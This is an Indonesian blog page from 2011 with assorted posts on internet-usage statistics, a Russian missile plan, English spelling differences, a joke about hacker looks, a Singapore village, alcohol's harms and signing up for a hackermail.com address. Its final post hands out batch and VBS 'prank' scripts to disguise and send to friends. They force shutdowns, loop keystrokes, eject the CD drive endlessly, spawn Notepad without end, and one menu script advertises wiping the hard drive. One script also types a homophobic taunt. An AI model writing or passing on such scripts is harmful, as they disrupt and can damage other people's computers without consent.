Pasang iklan Anda di sini.
http://goo.gl/ad3AU2

27 Download Screensaver Cewek Seksi Bersihin Layar Monitor

Sabtu, Desember 31, 2011
Cirebon-Cyber4rtKadang kalanya kalo terlalu banyak bekerja didepan komputer biasanya membuat mata menjadi cepat lelah, apalagi kalo monitornya rada buram gitu, karena kotoran mungkin. Nah bersihkan ajah dahulu layar monitornya biar ngga capek melototin layar yang kabur gitu. Niscaya konsentrasi Anda akan bertambah.




24 10 Fakta Kebiasaan Berinternet Orang Indonesia

Selasa, Desember 27, 2011
http://cirebon-cyber4rt.blogspot.com/2011/12/10-fakta-kebiasaan-berinternet-orang.html
10 Fakta Kebiasaan Berinternet Orang Indonesia

1. Satu dari tiga orang penduduk perkotaan di Indonesia mengakses internet dalam satu bulan terakhir.

2. Penetrasi internet pada segmen penduduk usia 15-29 tahun paling tinggi dibandingkan segmen usia lain dengan persentase sebesar 64 persen. Diikuti usia 20-24 tahun sebesar 42 persen. Berikutnya usia 25-29 tahun sebesar 28 persen, kemudian usia 30-34 tahun sebesar 16 persen, usia 40-44 tahun sebesar 12 persen, dan usia 45-50 tahun sebesar 5 persen.

3. Pengguna internet tidak hanya di kota besar, tetapi juga menyebar di kota-kota kecil.

4. Warung internet (warnet) paling sering digunakan mengakses internet, 83 persen dari pengguna online menggunakan warnet dalam satu bulan terakhir. Disusul akses dari handphone, PDA, dan perangkat mobile lain sebesar 22 persen, dari kantor 19 persen, dari sekolah 17 persen, dan dari rumah 16 persen.

5. Enam dari 10 pengguna internet mengunjungi situs jaringan sosial(social network) setiap bulan.

6. Sebanyak 28 persen masyarakat perkotaan mengakses internet dalam satu bulan terakhir. 6 persen mengakses internet tiap hari.

7. Penggunaan internet yang tinggi tidak hanya didominasi Jakarta, tetapi juga merata di banyak kota lain.

8. Aktivitas internet paling sering digunakan bukan untuk membuka berita online atau bertransaksi, melainkan untuk membuka email berbasis web sebesar 59 persen, instant messenger 58 persen, membuka situs jaringan sosial 58 persen, mesin pencari 56 persen, membaca berita online 47 persen. Setelah itu baru untuk keperluan lain. Untuk membuka internet banking hanya 5 persen. Untuk transaksi online? Masuk urutan terakhir, cuma 3 persen.

9. Yahoo! adalah layanan email berbasis web paling dominan, sedangkan Google dominan untuk mesin pencari.

10. Situs jaringan sosial masih merajai. Sebanyak 58 persen mengakses situs jaringan sosial.




20 Rusia Ciptakan Balistik Antar Benua Untuk Tembus Perisai Rudal AS

Minggu, Desember 25, 2011
Rusia akan mengembangkan rudal balistik antarbenua (ICBM) jenis baru yang dirancang khusus untuk menembus sistem perisai rudal rancangan AS. Rudal baru ini akan menggunakan bahan bakar cair sehingga memiliki kemampuan bermanuver lebih baik dibandingkan pendahulunya.

Rencana tersebut disampaikan Panglima Kesatuan Rudal Strategis Rusia (Strategic Missile Forces/SMF) Letnan Jenderal Sergei Karakayev di Moskwa, Jumat (16/12/2011) waktu setempat.

"Keputusan sudah dibuat untuk menciptakan jenis rudal berat yang diluncurkan dari silo dan akan memiliki kemampuan yang lebih canggih untuk menembus, secara hipotetis, sistem pertahanan rudal AS," tutur Karakayev, yang mengatakan, tahun depan pihaknya akan menguji coba sedikitnya 11 ICBM.

ICBM baru ini akan menggantikan ICBM lama andalan Rusia selama ini, yakni rudal Voyevoda R-36M2, yang oleh NATO diberi nama sandi rudal "Satan" (setan). R-36M2 mampu membawa hingga 10 hulu ledak nuklir dengan jarak jelajah maksimum 11.000 kilometer.

Hubungan Rusia dan AS akhir-akhir ini kurang mesra sejak AS dan NATO ngotot membangun sistem perisai rudal di Eropa. Rusia merasa terancam dengan sistem pertahanan tersebut, sementara AS dan NATO bersikeras sistem tersebut tidak ditujukan kepada Rusia, tetapi untuk menangkis serangan rudal balistik dari "negara-negara nakal" semacam Iran.

Menurut Karakayev, Iran belum memiliki teknologi ataupun potensi industri untuk membuat rudal-rudal balistik. Meski ada beberapa laporan media bahwa Iran telah menguji coba ICBM, SMF meragukan rudal-rudal Iran itu memiliki jarak jelajah efektif hingga ke Eropa.

Jenderal bintang tiga ini menambahkan, rudal-rudal lama Rusia yang masih menggunakan bahan bakar padat mungkin akan kesulitan menembus sistem perisai rudal terbaru AS. Roket berbahan bakar padat memiliki kelemahan, yakni sekali bahan bakar dinyalakan, seluruh cadangan bahan bakar akan terbakar habis tanpa bisa dihentikan.

Namun, dengan bahan bakar cair, pasokan bahan bakar yang dibakar bisa diatur menggunakan sistem pipa dan katup sehingga tenaga dorongan roket bisa diubah-ubah, yang artinya roket akan memiliki kemampuan manuver yang lebih baik.

Kelebihan ini masih ditambah dengan rencana Rusia menerapkan sistem kontrol rudal balistik generasi keempat (4G) mulai tahun depan. Sistem kontrol baru ini akan disebar di seluruh pos komando, tempat peluncuran tetap, hingga fasilitas peluncur mobil.

Karakayev mengatakan, sistem kontrol generasi baru ini dirancang khusus untuk memastikan kendali yang lebih canggih bagi rudal-rudal nuklir generasi baru milik Rusia. (Sumber: RIA Novosti)




6 Google: Teknologi Iran Tak Sepenuhnya Kita Pahami

Minggu, Desember 25, 2011
CEO Google Inc Eric Schmidt telah mengakui kemampuan luar biasa dari para ahli perang cyber di Iran, yang bereaksi terhadap jatuhnya sebuah pesawat mata-mata AS oleh Angkatan Darat Iran baru-baru ini.

"Ahli Iran yang berkemampuan luar biasa dalam perang cyber untuk beberapa alasan kita tidak sepenuhnya mengerti," kata Schmidt dalam sebuah wawancara dengan CNN, yang disiarkan pada hari Kamis.

Pada 4 Desember, unit perang elektronik militer Iran mengumumkan bahwa Iran telah 'menjatuhkan' dengan kerusakan minimal pesawat siluman pengintai AS RQ-170 Sentinel, sementara dia melanggar wilayah udara Iran.

Pesawat, dirancang dan dikembangkan oleh perusahaan Amerika Lockheed Martin, telah menyeberangi perbatasan Iran dengan Afghanistan dan dibawa turun ketika terbang di atas kota timur laut Kashmar.

Iran telah mengumumkan bahwa mereka berniat untuk melaksanakan reverse engineering pada pesawat udara itu, yang juga dikenal sebagai Beast of Kandahar, dan mirip di desain untuk seorang pembom siluman B-2 Angkatan Udara AS.

Mengakui kemampuan Iran untuk melakukan reverse engineering pesawat udara, Peter Grier, seorang staf penulis harian Christian Science Monitor online, menulis dalam sebuah artikel pada hari Kamis, "Ini pernah dilakukan sebelumnya, oleh suatu negara yang pada saat itu Amerika Serikat menganggap dia berteknologi rendah".

Menurut Grier, pada Agustus 1947, Uni Soviet mengarak pesawat Tu-4 Bull, replika dari sebuah pembom B-29 Amerika, yang telah disita pemerintah Soviet pada tahun 1944 setelah pesawat terpaksa melakukan pendaratan darurat di pangkalan Uni Soviet. (konspirasi.com)



33 Perbedaan Bahasa Inggris British dengan American

Kamis, Desember 22, 2011

Cirebon-Cyber4rt Apakah kalian tahu perbedaan Inggris British dan American? mungkin sebagian sudah ada yang tahu, dan sebagian lagi tidak... jadi ayo mari kita bahas bersama!


Berikut ini adalah beberapa perbedaannya:

Spelling
Bahasa Inggris British cenderung mempertahankan ejaan banyak kata yang asalnya dari Perancis, sedangkan Inggris American mencoba untuk mengeja kata lebih mendekati cara mereka melafalkannya dan mereka menghilangkan huruf-huruf yang tidak diperlukan.

Beberapa contohnya:
British
American
Colour
Color
Labour
Labor
Metre
Meter
Catalogue
Catalog
Theatre
Theater
Centre
Center
Apoligise
Apologize
Defence
Defense

Pronunciation
Orang Amerika biasanya melafalkan huruf “r” dengan menggulung lidah mereka ke belakang dan merapatkannya ke langit-langit mulut, sedangkan kebanyakan orang Inggris tidak melafalkan huruf “r” dalam kata, khususnya jika terdapat pada akhir kata.

Dalam bahasa Inggris Amerika kata “can” dan “can’t” kedengaran sangat mirip, sedangkan dalam bahasa Inggris British Anda bisa membedakannya secara jelas.

Orang Amerika cenderung melafalkan kata seperti “reduce”, “produce”, “induce”, “seduce” (kata-kata kerja yang berakhiran “duce”) dengan lebih rileks, yang berarti bahwa setelah huruf “d” mengikut bunyi/huruf “u”. Dalam bahasa Inggris British setelah huruf “d” ditambahkan “j”.

Orang Amerika memiliki kecenderungan untuk mereduksi kata dengan menghilangkan beberapa huruf. Kata “facts” misalnya dalam bahasa Inggris Amerika dilafalkan sama dengan kata “fax” - “t” tidak diucapkan.

Kadang-kadang huruf dihilangkan dalam bahasa Inggris British seperti dalam kata “secretary”, dimana huruf “a” tidak diucapkan.

Dalam bahasa Inggris Amerika, kombinasi huruf “cl” dalam kata seperti “cling”, “climat”, “club” dll, kedengaran lebih frikatif. Anda dapat menghasilkan bunyi ini dengan menegangkan pita suara.

Penekanan kata terkadang juga berbeda. Contoh, kata “details” mendapatkan penekanan pada huruf “e” dalam Inggris British dan pada “ai” dalam Inggris Amerika.

Vocabulary
British
American
Football
Soccer
Biscuit
Cookie
Toilet
Rest room
Shop
Store
Chemist
Drugstore
Pants
Trousers
Torch
Flashlight
Underground
Subway
Groundfloor (lt.dasar )
Firstfloor (lt.dasar)
Sweets
Candy
Rubbish bin
Trash can
Jadi mau pilih yang mana, bahasa Inggris British atau American? soalnya di Indonesia belum jelas pake aliran yang mana.

Source: Haxims Blog



64 Perkembangan Internet Indonesia - Resolusi Juara 2012

Senin, Desember 19, 2011
Assalamualaikum Wr. Wb.

Sekarang Internet sudah menjadi wacana pokok dizaman yang serba modern ini, kita tahu Indonesia adalah negara dengan pengguna internet terbesar kedua didunia setelah Russia. kita sebagai bangsa Indonesia selayaknya bangga dengan semua ini, tapi semua itu juga harus dibarengi dengan sikap yang dewasa. yaitu menggunakan  internet dengan etika yang baik.

Membahas tentang internet memang tidak akan pernah habis, didalamnya terkandung ribuan bahkan jutaan ilmu yang sangat bermanfaat. 


Resolusi juara, itu yang kali ini akan kita bahas bersama... Kalian tau apa itu Resolusi? Resolusi ialah ketetapan hati, kebulatan tekad untuk mengambil sikap, melakukan tindakan, serta menunjukan sesuatu yang baru yang berbeda dengan yang sudah-sudah. jadi dapat kita simpulkan bahwa Resolusi Juara adalah perubahan dari hal yang lama menuju ke hal yang baru.

Resolusi juara sangat berguna bagi bangsa indonesia, bangsa yang sedang mengalami siklus perubahan. khususnya perubahan dibidang internet dan teknologi.

Telkom Speedy sebuah perusahaan telekomunikasi ternama di Indonesia, adalah salah satu sarana bagi kita pengguna internet untuk dapat memaksimalkan perubahan Indonesia sebagai negara maju dibidang teknologi.


Dengan majunya sektor internet dan teknologi di Indonesia, mungkin 5 atau 7 tahun lagi kita bisa menyaingi Jepang atau bahkan Amerika Serikat. Jadi ayo! mari kita sama-sama membangun Indonesia yang kita cintai ini.

Wassalamualaikum Wr. Wb.



47 Ternyata Ciri -Ciri Hacker Dapat Dilihat Dari Fisiknya

Minggu, Desember 18, 2011
Ternyata Ciri -Ciri Hacker Dapat Dilihat Dari FisiknyaCirebon-Cyber4rt -  Tau Hacker? Itu loch orang yang hidupnya ngga terlepas dari dunia maya (Cyber-Space). Nah kali ini saya akan membahas ciri-ciri seorang hacker dari fisiknya...

http://cirebon-cyber4rt.blogspot.com/2011/12/ternyata-ciri-ciri-hacker-dapat-dilihat.html

1. Berkacamata
mengapa seorang Hacker biasa memakai kacamata...

gimana gak pake kacamata... wong tiap hari pelototin komputer terus....

minus... minus dah tuh mata...

tambah lagi Punya kaca mata yang bisa deteksi adanya jaringan wireless (udah ngayal nih) wkwkwk

2. Kemana-mana Bawa Tangtop... upss maksudnya Laptop...
setiap saat bisa langsung online nih.

3. Berbadan Kurus
kok Hacker berbadan kurus (tergantung selera, ada juga yang gemuk gan)
gimana gak kurus, tiap disuruh makan... "ntar dulu ah lagi nanggung neh didepan komputer"
makannya ntar aja...

4. Botak
Ga botak juga sih tergantung selera hacker juga kali, mungkin yang botak kebanyakan mikir sehingga rambutnya rontok semua.

5. Jarang Mandi
gimana gak jarang mandi....
disuruh mandi, ntar dulu ah lagi nanggung, dikit lagi bisa dijebol nech...
Jebol apa...??? gak tau dah...

6. Pake Celana Jeans sama Jaket Item
Tiap kalo jalan pasti pake celana Jeans ama Jaket item...
Ini Hacker apa Copet yach...???

7. Sering menghayal
Biasanya sih... Hacker sering menghayal.
gak tau ngehayal apa.... mungkin menghayal gimana bisa menembus komputer orang kale...

8. Sering Diem
Nah ini mungkin diem, karena dia menghayal tadi kayaknya....

9. Jarang tidur (begadangan)
kutak katik di depan kompie ampe pagi and pagi lagi...

10. Jarinya keriting
lho..kok jarinya bukan rambutnya...(kebanyakkan neken keybord)

11. Kalo kemana-mana Jakil
(jalan kaki karo sikil) kadang2 nebeng, kalo lagi ada duit naek angkot.

12. Matanya merah.
karena dari semua yang diatas tadi...1-11.

13. Tabungannya banyak
soalnya jarang makan dan jarang mandi (uang makan + uang buat beli sabun ditabung)

Source : Hacker Newbie



14 Ternyata di Negara Maju Seperti Singapura Masih Ada Kampung

Jumat, Desember 16, 2011
Ternyata di Negara Maju Seperti Singapura Masih Ada Kampung | Cirebon-Cyber4rt - Dibalik gemerlap modernisasi Singapura, sebuah kampung tradisional masih berdiri seakan menjaga eksistensinya. Kampong, sebuah kampung tradisional di Lorong Buangkok, tengah jantung Singapura.

Tersembunyi di balik dinding pohon, deretan rumah kayu reyot dengan atap seng, berjejer bersama kesederhanaan.

Meski jauh dari keglamoran Singapura yang tersohor oleh mata dunia, warga di Kampong, tampak hidup bahagia bersama kesederhanaan yang melekat dalam kehidupan mereka.

Banyak ayam dan anjing kampung bebas berkeliaran, suara jangkrik di malam hari dan kicauan burung di pagi hari adalah yang mendominasi latar belakang kehidupan 28 keluarga yang tinggal di kampung Kampong ini.

Sebenarnya, kampung Kampong ini tidak asli berada di Lorong Buangkok. Mereka dialokasikan dari wilayah asli mereka yang menjadi kawasan perumahan modern.

Jika Anda ingin melihat sisi lain Singapura, tak ada salahnya berplesir ke kampung ini. Dari stasiun MRT Ang Mo Kio, Anda dapat melanjutkan perjalanan dengan menggunakan bus 88. Berhenti di Ang Mo Kio Ave 5. Berjalan lah ke arah utara pedestrian Yio Chu Kang sekira 50 meter, belok kanan, dan Anda akan menemukan Gerald Drive.

Lanjutkan perjalanan sejarak 200 meter lagi saja, dan belok kanan. Maka sampai lah Anda ke jalanan yang tak sebersih jalan-jalan di Singapura pada umumnya, di situ lah Lorong Buangkok. Lokasi di mana Anda dapat mengetahui sisi lain kehidupan di Singapura.














Sumber : Kaskus



17 10 Alasan Kenapa Minuman Alkohol Harus Dijauhi

Kamis, Desember 15, 2011
10 Alasan Kenapa Minuman Alkohol Harus DijauhiCirebon-Cyber4rtAlkohol bisa berasal dari mana saja, tapi yang paling populer terdapat dalam minuman anggur, bir atau minuman keras lainnya. Ada 10 alasan kenapa minuman alkohol memang harus dijauhi.



Minuman alkohol memang bisa bagus untuk kesehatan misalnya menghangatkan tubuh di udara yang dingin. Tapi yang banyak terjadi alkohol dikonsumsi secara berlebihan hingga manfaatnya hilang.

Tidak peduli berapa pun usia seseorang, alkohol bisa menimbulkan dampak yang serius terhadap kesehatan dan dirinya sendiri.
Dikutip dari Livestrong, Jumat (22/10/2010) ada 10 alasan kenapa minuman alkohol layak dijauhi, yaitu:

Kecanduan adalah salah satu efek yang paling terlihat jika seseorang menggunakan alkohol dalam jangka waktu panjang. Hal ini berarti seseorang harus minum lebih banyak sebelum mabuk atau agar bisa merasa lebih rileks.

Seseorang akan mengalami gejala penarikan (withdrawal) ketika mencoba untuk berhenti minum secara tiba-tiba atau saat bangun keesokan harinya. Gejala ini termasuk merasa cemas, mual, muntah, mudah marah, kehilangan nafsu makan dan perasaan gemetar.

Menurut University of Maryland Medical Center penggunaan alkohol bisa menyebabkan penyakit hati kronis, seperti fatty liver (lebih dari 90 persen pengguna alkohol), serta hepatitis alkoholik dan sirosis alkohol yang bisa mengakibatkan kegagalan hati.

Alkohol akan mengganggu kemampuan seseorang mengemudi dan memperlambat proses berpikir. Gabungan kondisi ini menjadi penyebab seseorang mengalami kecelakaan setelah minum alkohol.

Alkohol bisa mengurangi kemampuan inhibisi alami seseorang, sehingga orang yang mabuk seringkali melakukan hal-hal berbahaya tanpa disadarinya seperti berhubungan seks tanpa menggunakan kondom atau menyeberang jalan sembarangan.

Mengonsumsi alkohol tidak hanya berefek terhadap diri sendiri, tapi juga orang-orang disekitarnya seperti anak-anak. Karenanya kekerasan rumah tangga seringkali terjadi pada orang yang menyalahgunakan alkohol dan anak-anak mungkin menderita trauma jangka panjang akibat kebiasaan minum orangtuanya tersebut.

Dalam jangka pendek alkohol bisa memberikan efek rileksasi, tapi tanpa disadari alkohol justru memberikan kontribusi terhadap perkembangan depresi. Sekitar 40 persen peminum berat menunjukkan tanda-tanda depresi.

Semakin sering seseorang minum alkohol, maka semakin berkurang pemikirannya tentang tanggung jawab termasuk pekerjaan. Hal ini akan menurunkan produktivitas bekerja dan nantinya berujung pada pengangguran.

Mengonsumsi alkohol bisa memicu terjadinya masalah hukum, seperti ditangkap akibat perilaku tidak tertib atau mengemudi dibawah pengaruh alkohol.

Seseorang yang mengonsumsi alkohol lama kelamaan akan mengabaikan kebersihan dirinya sendiri, seperti memakai baju yang sama berulang-ulang, jarang mandi atau lupa menyikat gigi. Karena yang ada di dalam pikiran orang tersebut hanyalah alkohol dan berhenti memikirkan hal lainnya.

Source : Punyaolickz




25 Cara Buat Email Pake Domain hackermail.com

Senin, Desember 12, 2011
Cirebon-Cyber4rt - Mungkin kita sudah sering mendengar domain email seperti @yahoo.com @gmail.com @hotmail.com dan @email yang lain–lain. Suatu hari ketika saya bermain internet di hotspot, saya melihat seorang om–om yg mempunyai email seperti ini [email]emailomitu@consultant.com[/email], kemudian pada hari ini juga saya melihat seseorang yg mempunyai email seperti ini [email]emailseseorang@hackermail.com[/email], Mantap bukan email mereka ?

Pertama saya tidak percaya kalau ada domain email @hackermail.com, kemudian saya mencoba menelusurinya melalui browser Mozilla saya dengan url http://www.hackermail.com/ ternyata saya langsung di arahkan ke http://www.mail.com/” dan ternyata lagi web ini adalah vendor penyedia domain email @hackermail.com, ternyata saya juga bisa membuat email dengan nama [email]david_michael@hackermail.com[/email] >> jadi terlihat sedikit sangar dengan email seperti ini. Tenang anda juga bisa membuatnya, ini dia step by stepnya cekidot langsung ya...


1. Buka http://www.mail.com/ lalu klik Sign Up Now


2. Setelah itu kamu akan dibawa ke form registrasi emailnya, isi sesuai dengan keinginan kamu, Pada bagian Choose a user name isi dengan username yg nantinya akan menjadi email kamu, dan setelah bagian @ kamu bisa memilih domain @hackermail.com yg merupakan pembagian dari Hobbies sebenarnya masih banyak domain email yg bisa kamu pilih seperti @consultant.com, @mail.com, @email.com, @asia.com, dll Nah kalau udah diisi semua klik Create Account.


3. Kalau berhasil, nanti akan muncul page seperti ini, untuk masuk ke email kamu, klik saja You Have New Email. Sorry di bagian Security Question dan My Answer sengaja saya sensor agar email saya tidak dijebol oleh teman – teman sekalian yg melihat tutorial ini hehehe peace dah!


4. Nah, bagaimana? gampang bukan tutorialnya ? Selamat ya.. sekarang kamu sudah punya email dengan domain @hackermail.com, jadi terlihat lebih sangarkan?


Sumber: Kaskus



55 Kumpulan Script Code Untuk Isengi Teman-teman Anda

Jumat, Desember 09, 2011
Cirebon-Cyber4rt - Malem sob, Kali ini saya akan membahas tentang script code. Saat saya lagi menjelajahi forum xcode saya bertemu dengan kode script yang keren-keren ini. Saya pikir script ini cocok buat isengin teman-teman sobat hehehee...




1). Memberi sedikit pesan dan shutdown komputer teman anda.
Ketik kode:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

- Save As menggunakan Extension .BAT lalu kirim ke teman anda.

Contoh: apasaja.bat

2). Menyalakan tombol Caps lock secara simultan.
Ketik kode:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

- Save As .VBS terus kirim ke teman anda

        Contoh: apasaja.VBS

3). Buka/tutup CD drive secara terus menerus.
Ketik kode:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

- Save As .VBS terus kirim ke teman anda.

4). Yang ini script fungsinya supaya tekan enter secara simultan.
Ketik kode :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

- Save As .VBS terus kirim ke teman anda.

5). Script ini Fungsinya untuk membuka notepad, kemudian akan mengetik pesan kita secara otomatis di notepad.
Ketik kode:

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

- Save As .VBS terus kirim ke teman anda.

6). Membuat script VBS ini menjalankan BACKSPACE secara simultan.
Ketik Code:

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

- Save As .VBS terus kirim ke teman anda

7). Hack keyboard sehingga temen lu dipaksa ngetik " u are a gay" secara simultan.
Ketik kode:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a gay"
loop

- Save As .VBS trus kirim ke teman anda


8). Buka Notepad secara terus menerus.

Ketik kode:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

- Save As .BAT terus kirim ke teman anda

9). Script BAT yang ini bakal munculin 5 pilihan yang harus temen kalian diantaranya adalah:


1. Shutdown

2. Restart
3. Hapus HardDrive 
4. Net Send
5. Menampilkan pesan, kemudian shutdown

Ketik kode:

@echo off
title The end of the world
cd C:\
:menu
cls
echo oops gw gak tanggung jawab lho apa yang barusan lu lakuin hehhe,,semuanya dh jadi tanggung jawab lu sendiri...
pause
echo pilih nama cwe yang lu suka =P :
echo 1. datanya bakal ilang lho.
echo 2. komputer nya corrupt lho
echo 3. heheh no comment deh klo yang ini
echo 4. mau mati pake jalan ini?
echo 5. bye bye...
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Dari 9 kode Script diatas, sobat bisa kembangin dari 9 script digabung menjadi 1, Kemudian lihat hasilnya...??

Wkwkwk ^_^



Contact

Nama

Email *

Pesan *